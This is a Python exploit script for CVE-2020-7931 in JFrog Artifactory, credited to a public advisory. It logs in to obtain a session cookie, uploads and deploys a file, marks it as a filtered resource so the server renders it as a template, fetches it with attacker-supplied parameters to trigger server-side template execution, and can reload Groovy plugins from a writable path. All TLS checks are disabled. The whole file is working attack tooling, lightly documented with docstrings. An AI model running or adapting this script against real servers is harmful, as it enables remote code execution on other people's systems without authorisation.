artifactory_CVE-2020-7931.py
#!/usr/bin/env python3
# Credits: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0006.md
# Install docker artifactory: https://www.jfrog.com/confluence/display/JFROG/Installing+Artifactory#InstallingArtifactory-DockerInstallation
# Default artifactory web application root path (where you can write): /opt/jfrog/artifactory/tomcat/webapps/artifactory/
# Default tomcat webapps path (for .war files): /opt/jfrog/artifactory/tomcat/webapps/
# Default upload path: /var/opt/jfrog/artifactory/data/tmp/artifactory-uploads/
# Symlinked: /opt/jfrog/artifactory/data/tmp/artifactory-uploads/
# Default plugins path (for .groovy files): /var/opt/jfrog/artifactory/etc/plugins/
# Symlinked: /opt/jfrog/artifactory/etc/plugins/
import argparse
import requests
import json
import urllib3
# Default repository key used by the deploy, filter and fetch requests below.
# The command-line handling at the end of the file rebinds it when
# -R/--repository_name is given.
repo_name = 'example-repo-local'
# SUPPRESS WARNINGS ############################################################
# Every request in this script passes verify=False, so the server certificate
# is never validated; this call only hides the InsecureRequestWarning that
# urllib3 would otherwise emit for each of those requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# FUNCTIONS ####################################################################
def get_cookie(host, user, password):
    """Log in through the UI login endpoint and print the cookies it sets.

    POSTs the credentials as a JSON body to ``/artifactory/ui/auth/login``,
    prints the raw response body, then prints the value of each cookie found
    on the response.  Nothing is returned; the caller copies the cookie value
    from stdout.

    Args:
        host: Base URL of the server, without a trailing slash.
        user: Account name sent in the ``user`` field.
        password: Password sent in the ``password`` field.
    """
    login_url = host + '/artifactory/ui/auth/login'
    payload = json.dumps({'user':user, 'password':password, 'type':'login'})
    # verify=False: the TLS certificate presented by the server is not checked.
    response = requests.post(login_url,
                             headers={'Content-Type':'application/json'},
                             data=payload,
                             verify=False)
    print(response.text)
    # Cookie values go to stdout in clear text, one per line.
    for jar_entry in response.cookies:
        print(jar_entry.value)
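def upload(host, file_to_upload, cookie):
    """POST a local file to the UI upload endpoint as multipart form data.

    The file is sent in the ``upload_file`` form field to
    ``/artifactory/ui/artifact/upload`` with the ``SESSION`` cookie and the
    ``X-Requested-With: artUI`` header.  The response body is printed; nothing
    is returned.

    Args:
        host: Base URL of the server, without a trailing slash.
        file_to_upload: Path of the local file to read in binary mode.
        cookie: Value for the ``SESSION`` cookie.

    Raises:
        OSError: If ``file_to_upload`` cannot be opened.
    """
    cookies = {'SESSION':cookie}
    headers = {'X-Requested-With':'artUI'}
    # The context manager closes the handle even when the request raises;
    # the file was previously opened inline and never closed.
    with open(file_to_upload, 'rb') as handle:
        # verify=False: the server certificate is not validated.
        r = requests.post(host + '/artifactory/ui/artifact/upload',
                          cookies=cookies, headers=headers,
                          files={'upload_file': handle}, verify=False)
    print(r.text)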
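def deploy_template(host, template, cookie):
    """Ask the UI deploy endpoint to place a previously uploaded file in the repository.

    POSTs a JSON ``deploy`` action to ``/artifactory/ui/artifact/deploy``
    naming ``template`` as both the target path (prefixed with ``/``) and the
    file name, with the module-level ``repo_name`` as the repository key.
    The response body is printed; nothing is returned.

    Args:
        host: Base URL of the server, without a trailing slash.
        template: File name of the uploaded artifact.
        cookie: Value for the ``SESSION`` cookie.
    """
    cookies = {'SESSION':cookie}
    headers = {'X-Requested-With':'artUI', 'Content-Type':'application/json'}
    # Serialise with json.dumps instead of string concatenation so that a
    # quote, backslash or non-ASCII character in the file or repository name
    # cannot produce a malformed body.  Compact separators and the same key
    # order keep the bytes identical to the hand-built string for plain names.
    data = json.dumps({
        'action': 'deploy',
        'unitInfo': {
            'artifactType': 'base',
            'path': '/' + template,
            'mavenArtifact': False,
            'valid': True,
            'origArtifactType': 'base',
            'debianArtifact': False,
            'vagrantArtifact': False,
            'composerArtifact': False,
            'cranArtifact': False,
            'bundle': False,
            'type': 'xml',
        },
        'fileName': template,
        'repoKey': repo_name,
    }, separators=(',', ':'))
    # verify=False: the server certificate is not validated.
    r = requests.post(host + '/artifactory/ui/artifact/deploy',
                      cookies=cookies, headers=headers, data=data, verify=False)
    print(r.text)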
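def set_filtered(host, template, cookie):
    """Set the "filtered" flag on a deployed artifact through the UI endpoint.

    POSTs the repository key (module-level ``repo_name``) and the artifact
    path to ``/artifactory/ui/filteredResource?setFiltered=true``.  The
    response body is printed; nothing is returned.

    Args:
        host: Base URL of the server, without a trailing slash.
        template: Path of the artifact inside the repository.
        cookie: Value for the ``SESSION`` cookie.
    """
    cookies = {'SESSION':cookie}
    headers = {'X-Requested-With':'artUI', 'Content-Type':'application/json'}
    # json.dumps escapes quotes and backslashes that the previous string
    # concatenation passed through verbatim; compact separators keep the
    # body byte-identical for plain names.
    data = json.dumps({'repoKey': repo_name, 'path': template},
                      separators=(',', ':'))
    # verify=False: the server certificate is not validated.
    r = requests.post(host + '/artifactory/ui/filteredResource?setFiltered=true',
                      cookies=cookies, headers=headers, data=data, verify=False)
    print(r.text)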
def drop_template(host, template, cookie):
    """Run the upload, deploy and set-filtered steps for one file, in that order.

    Each step is called with the same ``(host, template, cookie)`` arguments
    and prints its own response.  In server-side request logs this shows up as
    three consecutive POSTs: the upload endpoint, the deploy endpoint, then
    ``filteredResource?setFiltered=true``.

    Args:
        host: Base URL of the server, without a trailing slash.
        template: Local file path, reused as the artifact name by the later steps.
        cookie: Value for the ``SESSION`` cookie.
    """
    # Order matters: each step acts on the result of the one before it.
    for step in (upload, deploy_template, set_filtered):
        step(host, template, cookie)
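def exec_template(host, template, arguments, cookie):
    """Fetch an artifact from the repository, passing numbered query parameters.

    Issues a GET for ``/artifactory/<repo_name>/<template>`` with each entry of
    ``arguments`` attached as ``?0=<first>&1=<second>...`` and prints the
    response body.  Nothing is returned.
    NOTE(review): the function name implies the server renders the artifact as
    a template; see the advisory credited in the file header for details.

    Args:
        host: Base URL of the server, without a trailing slash.
        template: Artifact path inside the repository.
        arguments: Sequence of strings; the position of each becomes its
            parameter name.  May be empty.
        cookie: Value for the ``SESSION`` cookie.
    """
    cookies = {'SESSION':cookie}
    # Values are inserted as given, without percent-encoding.
    pairs = ['{}={}'.format(index, argument)
             for index, argument in enumerate(arguments)]
    # With no arguments the query string is empty; previously http_arguments
    # was never assigned in that case and the request line raised
    # UnboundLocalError.
    http_arguments = '?' + '&'.join(pairs) if pairs else ''
    # verify=False: the server certificate is not validated.
    r = requests.get(host + '/artifactory/' + repo_name + '/' + template + http_arguments,
                     cookies=cookies, verify=False)
    print(r.text)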
def reload_plugins(host, cookie):
    """POST to the plugin-reload API endpoint and print the result.

    Prints the full endpoint URL first, then sends an empty POST to
    ``/artifactory/api/plugins/reload`` with the ``SESSION`` cookie and the
    ``X-Requested-With: artUI`` header, and prints the response body.

    Args:
        host: Base URL of the server, without a trailing slash.
        cookie: Value for the ``SESSION`` cookie.
    """
    endpoint = host + '/artifactory/api/plugins/reload'
    print(endpoint)
    # verify=False: the server certificate is not validated.
    response = requests.post(endpoint,
                             cookies={'SESSION':cookie},
                             headers={'X-Requested-With':'artUI'},
                             verify=False)
    print(response.text)
# MAIN #########################################################################
# Command-line interface.  Only -H/--host is mandatory; every other option
# selects an action or supplies a value one of the actions reads.
cli = argparse.ArgumentParser(description = '')
cli.add_argument('-H', '--host', type=str, required=True)
# Credentials, read only by the -g/--get_cookie action.
cli.add_argument('-u', '--user', type=str)
cli.add_argument('-p', '--password', type=str)
# Session cookie value passed to every action except -g.
cli.add_argument('-c', '--cookie', type=str)
cli.add_argument('-U', '--upload', type=str)
cli.add_argument('-g', '--get_cookie', action='store_true')
cli.add_argument('-d', '--drop_template', type=str)
cli.add_argument('-e', '--exec_template', type=str)
cli.add_argument('-r', '--reload_plugins', action='store_true')
cli.add_argument('-R', '--repository_name', type=str, help='Default: example-repo-local')

# parse_known_args keeps unrecognised tokens; they are forwarded to
# exec_template as its numbered query parameters.
opts, passthrough = cli.parse_known_args()

# Strip trailing slashes so host + '/artifactory/...' never contains '//'.
host = opts.host.rstrip('/')

# Rebind the module-level default repository key when one is supplied.
if opts.repository_name:
    repo_name = opts.repository_name

# Actions are independent and run in this fixed order when several are given.
if opts.upload:
    upload(host, opts.upload, opts.cookie)

if opts.get_cookie:
    get_cookie(host, opts.user, opts.password)

if opts.drop_template:
    drop_template(host, opts.drop_template, opts.cookie)

if opts.exec_template:
    exec_template(host, opts.exec_template, passthrough, opts.cookie)

if opts.reload_plugins:
    reload_plugins(host, opts.cookie)